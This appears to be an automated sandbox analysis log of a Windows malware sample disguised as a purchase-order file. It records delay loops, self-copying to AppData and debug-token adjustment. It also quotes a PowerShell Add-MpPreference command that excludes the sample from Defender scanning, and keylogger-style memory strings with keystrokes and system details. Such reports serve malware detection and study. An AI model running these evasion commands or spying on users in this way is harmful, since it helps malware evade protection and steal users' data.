                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395438Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395313Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395201Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394969Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394840Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394734Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394625Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394516Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394406Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394297Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394188Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394063Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2393953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399766
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399547
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399437
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399328
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399218
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399108
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399000
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398890
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398781
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398672
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398562
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398453
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398343
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398234
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398124
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398015
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397899
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397789
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397649
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397540
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397437
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397328
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397219
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397109
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396999
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396890
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396781
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396669
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396562
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396453
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396344
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396234
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396125
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396015
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395905
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395797
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395687
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395578
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395468
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395359
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395250
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395140
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395031
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394921
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394812
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394703
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394581
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4192184957.00000000060C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Process created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerLR
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q9<b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}rTH
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q3<b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q><b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}r{Win}TH
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q?<b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}r{Win}rTH
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q8<b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}TH
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Time: 11/24/2024 00:19:36<br>User Name: user<br>Computer Name: 506407<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (27/09/2024 06:43:05)<br>{Win}r{Win}r
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Queries volume information: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe VolumeInformation
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
